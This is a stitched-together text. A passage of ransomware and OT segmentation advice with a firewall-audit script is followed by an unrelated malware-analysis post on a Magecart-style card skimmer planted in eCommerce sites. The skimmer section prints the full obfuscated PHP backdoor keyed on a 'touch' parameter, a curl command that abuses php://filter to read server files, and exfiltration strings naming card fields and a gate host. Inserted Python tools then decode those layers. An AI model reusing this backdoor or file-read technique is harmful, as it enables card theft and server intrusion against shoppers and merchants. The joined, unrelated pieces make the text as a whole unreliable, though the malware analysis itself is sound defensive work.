  • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
  • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
  • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
  • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
  • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
  • Note that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.
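The segregation and routine-auditing recommendation in the list above can be checked mechanically against a firewall policy. The following is an added example, not part of the original article: the zone names, the rule format, the ruleset and the service-to-port table are all constructed assumptions, and rules are evaluated first-match with an implicit final deny.

```python
"""Audit a zone firewall policy for services ransomware uses to spread.

Rules, zone names and the service-to-port table are constructed for this
example; evaluation is first-match with an implicit final deny.
"""
# Assumed mapping of the services named in the text to their listener ports.
PROPAGATION_SERVICES = {
    "SMB": ("tcp", 445),
    "SMB over NetBIOS": ("tcp", 139),
    "RDP": ("tcp", 3389),
    "WMI/DCOM endpoint mapper": ("tcp", 135),
}

ZONES = ["corp", "ot-primary", "ot-redundant"]

# Constructed ruleset. Rule 1 denies 135-139, but rule 2 still lets 445 in.
RULES = [
    {"action": "allow", "src": "corp", "dst": "ot-primary",
     "proto": "tcp", "ports": "443"},
    {"action": "deny", "src": "corp", "dst": "ot-primary",
     "proto": "tcp", "ports": "135-139"},
    {"action": "allow", "src": "corp", "dst": "ot-primary",
     "proto": "tcp", "ports": "1-1024"},
    {"action": "allow", "src": "ot-primary", "dst": "ot-redundant",
     "proto": "any", "ports": "any"},
    {"action": "deny", "src": "any", "dst": "any",
     "proto": "any", "ports": "any"},
]


def port_matches(spec, port):
    """spec is 'any', a single port, a range 'a-b', or a comma list."""
    if spec == "any":
        return True
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def decide(rules, src, dst, proto, port):
    """Return (action, rule index) of the first matching rule."""
    for index, r in enumerate(rules):
        if (r["src"] in (src, "any") and r["dst"] in (dst, "any")
                and r["proto"] in (proto, "any")
                and port_matches(r["ports"], port)):
            return r["action"], index
    return "deny", None


def audit(rules, zones):
    """List every cross-zone path on which a propagation service is
    allowed, with the index of the rule that allows it."""
    findings = []
    for src in zones:
        for dst in zones:
            if src == dst:
                continue
            for service, (proto, port) in PROPAGATION_SERVICES.items():
                action, index = decide(rules, src, dst, proto, port)
                if action == "allow":
                    findings.append((src, dst, service, index))
    return findings


if __name__ == "__main__":
    for finding in audit(RULES, ZONES):
        print("%s -> %s: %s allowed by rule %d" % finding)
```

In this ruleset the explicit deny for 135-139 gives a false sense of coverage: SMB on 445 still crosses from the corporate zone through the broad 1-1024 allow, and the any/any rule between primary and redundant OT assets defeats their segregation.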

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of interest to you. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not one hundred percent sure that the discovered implant is an evolution of Magecart, since the activation scripts are quite different even if they do use Magento core infrastructure. As far as I currently understand, we might be facing a new Magecart version or a new framework; notes and suggestions are always welcome.

Disclaimer

National law enforcement units have been alerted; a few hours have passed since they gave me the authorization to publish this post. If you used your credit card on one of the following eCommerce sites (IoC section), please consider your credit card no longer private: call your bank and follow the deactivation steps. Since the C2 and relays are still up and running, the addresses have been obfuscated in order to avoid replication. I want to thank Daniele B. for giving me the first “wired eCommerce”.

Analysis

Everything starts from a vulnerable eCommerce website. The user doesn’t notice anything weird, since she would normally add items to her web cart, surfing from page to page, watching and selecting items, and finally deciding to check them out by registering a new account or proceeding as a guest user. However, the attacker could abuse the eCommerce vulnerabilities to introduce a nasty JavaScript that sends information (for example: name, address, email, credit card number, CVV, expiration date, and so on) to another host belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

In Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.]php. This POST carries a quite interesting payload, partially shown (to avoid an info leak) in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands on an external gate hosted on *****.]com. This is a slightly different behavior compared to the original Magecart, which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). Further investigation of this relay shows a Magento core installation (a common Magecart indicator) which includes js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php), a tool that dynamically builds a composite JavaScript file to improve performance and compression rates. By using this public Magento core functionality and by guessing file paths (looking for known public folders on the host helps in guessing paths) we might obtain the original malicious back-end file injected by the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

<?php 
if(isset($_GET['touch']))
$_POST['touch']=$_GET['touch'];

eval(gzuncompress(base64_decode('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')));

We are now facing an initial stage of obfuscated PHP code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch”, which activates the process in both flavors: GET and POST. Once the activation variable is found, a compressed and encoded payload is fed into a chain of multiple variable concatenations and later executed (eval).

Fig2: Payload Stage 1
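The outer layer shown above can be unpacked without ever executing it. The following added example (not the author's tooling) statically peels `eval(...)` wrappers whose argument is a string literal, as in the `eval(gzuncompress(base64_decode('…')))` line above, and lists the request parameters each layer reads; it goes slightly beyond the page by also recognising a few other common PHP decoders. The sample is constructed and harmless, all function names are hypothetical, and layers built from variable concatenation still need manual work.

```python
"""Statically peel eval(decoder(...('literal'))) layers from a PHP file without running it."""
import base64
import codecs
import re
import zlib

MAX_OUT = 8 * 1024 * 1024  # refuse layers that inflate past 8 MiB


def _inflate(data: bytes, wbits: int) -> bytes:
    d = zlib.decompressobj(wbits)
    out = d.decompress(data, MAX_OUT)
    if d.unconsumed_tail:
        raise ValueError("layer expands beyond MAX_OUT")
    return out


def _b64(data: bytes) -> bytes:
    # PHP's non-strict base64_decode skips characters outside the alphabet
    s = re.sub(rb"[^A-Za-z0-9+/]", b"", data)
    return base64.b64decode(s + b"=" * (-len(s) % 4))


# PHP function name -> equivalent transformation on bytes
DECODERS = {
    "base64_decode": _b64,
    "gzuncompress": lambda b: _inflate(b, 15),   # zlib stream
    "gzinflate": lambda b: _inflate(b, -15),     # raw deflate
    "gzdecode": lambda b: _inflate(b, 31),       # gzip container
    "strrev": lambda b: b[::-1],
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}

LAYER_RE = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])(.*?)\2[\s)]*;", re.S)
ACTIVATOR_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[\s*['\"](\w+)['\"]\s*\]")


def peel(src: str):
    """Return (decoded_text, chain) for the first eval wrapper in src, or None."""
    m = LAYER_RE.search(src)
    if not m:
        return None
    chain = re.findall(r"\w+", m.group(1))      # outermost call first
    data = m.group(3).encode("latin-1", "replace")
    for name in reversed(chain):                 # the innermost call runs first
        if name not in DECODERS:
            raise ValueError(f"unsupported wrapper: {name}")
        data = DECODERS[name](data)
    return data.decode("utf-8", errors="replace"), chain


def unpack(src: str, max_layers: int = 16) -> dict:
    """Peel layers until no literal eval wrapper is left; nothing is executed."""
    layers, chains = [src], []
    while len(chains) < max_layers:
        step = peel(layers[-1])
        if step is None:
            break
        layers.append(step[0])
        chains.append(step[1])
    activators = sorted({f"$_{k}[{n}]" for layer in layers
                         for k, n in ACTIVATOR_RE.findall(layer)})
    return {"depth": len(chains), "chains": chains,
            "activators": activators, "final": layers[-1]}


def build_sample() -> str:
    """Constructed two-layer sample shaped like the stage-1 file above (harmless body)."""
    final = "/* constructed placeholder body */ $p = $_POST['touch'];"
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(final.encode()) + c.flush()
    layer2 = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()
    blob = base64.b64encode(zlib.compress(layer2.encode())).decode()
    return ("<?php\nif(isset($_GET['touch']))\n$_POST['touch']=$_GET['touch'];\n"
            "eval(gzuncompress(base64_decode('%s')));\n" % blob)


if __name__ == "__main__":
    report = unpack(build_sample())
    print(report["depth"], report["chains"], report["activators"])
    print(report["final"])
```

Run against a copy of a suspect file taken from the web root; the `activators` list is a quick way to find the request parameter to search for in access logs.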

By following the obfuscation chain in reverse order we end up with the following code (Fig3). This time the attacker used more obfuscation techniques: charset differentiation, junk code and sparse random comments, making the overall reading quite hard. But by taking my time, ordering every single line, substituting variables and re-encoding with my favorite charset, I was able to extract the decoding loop and to quickly understand the payload behavior.

Fig3: Payload Stage 3

Indeed, once the script decodes the payload received from the compromised eCommerce (by rotating on charsets with hard-coded strings; Fig3 decodes the content of the touch variable), every stolen field is ordered into a crafted object and sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section helps us understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;
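For triage of proxy or WAF logs, the following added example (not code from the original post) decodes a captured `touch` value and reports which of the fields named in the strings above left the site, without printing card data. It assumes the value is byte-wise nibble-swapped hex of a form-encoded string, which is what the first bytes of the sample POST body earlier in this post decode to (`86f63747d3` is `host=`); the sample input is constructed and all function names are hypothetical.

```python
"""Decode a captured `touch` value and summarise what left the site, masking card data."""
import re
from urllib.parse import parse_qsl, urlencode

CARD_FIELDS = ("number", "exp1", "exp2", "cvv")  # names from the recovered strings


def decode_touch(value: str, tolerate_truncation: bool = True) -> dict:
    """Undo the per-byte nibble swap, then parse the form-encoded body."""
    value = value.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", value):
        raise ValueError("touch value is not hex")
    if len(value) % 2:
        if not tolerate_truncation:
            raise ValueError("odd number of hex digits")
        value = value[:-1]  # log line cut mid-byte: drop the dangling nibble
    # Reversing the hex digits and then the bytes swaps the nibbles of every byte in place.
    raw = bytes.fromhex(value[::-1])[::-1]
    return dict(parse_qsl(raw.decode("utf-8", errors="replace"), keep_blank_values=True))


def luhn_valid(pan: str) -> bool:
    """True when the digits form a plausible card number (Luhn checksum)."""
    digits = [int(c) for c in pan if c.isdigit()]
    if not 12 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def triage(value: str) -> dict:
    """Summary that is safe to paste into a ticket: the card number is masked."""
    fields = decode_touch(value)
    pan = re.sub(r"\D", "", fields.get("number", ""))
    return {
        "host": fields.get("host"),
        "leaked_fields": sorted(k for k, v in fields.items() if v),
        "card_fields_present": [k for k in CARD_FIELDS if fields.get(k)],
        "pan_masked": "*" * max(len(pan) - 4, 0) + pan[-4:],
        "pan_luhn_valid": luhn_valid(pan),
    }


def nibble_swap_hex(text: str) -> str:
    """Inverse transform, used here only to build the constructed sample."""
    return text.encode()[::-1].hex()[::-1]


def build_sample() -> str:
    """Constructed capture using a well-known test card number, not real data."""
    return nibble_swap_hex(urlencode({
        "host": "shop.example", "number": "4111111111111111", "exp1": "12",
        "exp2": "2030", "cvv": "123", "firstname": "Test", "email": "test@example.com",
    }))


if __name__ == "__main__":
    print(triage(build_sample()))
```

A Luhn-valid number in `pan_luhn_valid` is the signal that a real card, rather than a test order or a scanner probe, passed through the skimmer.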

We actually have one more host that needs to be analyzed. Taking a closer look at the domain used, we might agree that it looks like the final proxy gate, which stores data in a database (MongoDB). Again, by enumerating and searching its public information it was possible to identify the technology used to host the new malicious implant (Docker Compose to build up the infrastructure). By spotting a temporary directory, used to store temporary files within the attacker infrastructure, I was able to build a simple monitoring script which revealed the most used compromised eCommerce sites.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain, since many eCommerce sites could have a low selling rate (rate of customers during my monitoring phase). In this case, even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking at, converting and importing the temporary files generated every time a data leak happens (every time a user enters a credit card). So we might end up using another method. Fortunately the host has a PTR (pointer record) to mo-------.]fvds].ru, as shown in Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recalls, in a unique way, the email address used to register mag^^^^^^.]su (mo------@protonmail.]com). BTW, it has been active since 2019-07!!

Fig5: registered eMail Address

According to URLSCAN, when using the PTR record to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce sites. Now, I am not saying that every single eCommerce in the list has been compromised, but taking 3 of them at random (reported in the IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (that is, every one that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io, most of the websites pointing to momo--------s.]ru follow the geographic distribution shown in Fig7. Most of them are US based, followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, the stats (Fig7) are surprisingly telling.

Fig7: Location of Possible Compromised eCommerce

IoC

The following IoCs have been extracted from the command and control as described in the Analysis section. I do have evidence that those eCommerce sites send credit card numbers to magesource, but I did not analyse every single eCommerce outside the “High Confidence” list; those could be compromised using different infection chains. More potentially compromised eCommerce sites could be found; a nice unverified list (“Low Confidence”) follows.

High Confidence Compromised:

– (POST): https://*****/js/ar/ar2497.php
– Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
– mom*****@protonmail.]com (email used to register c2)
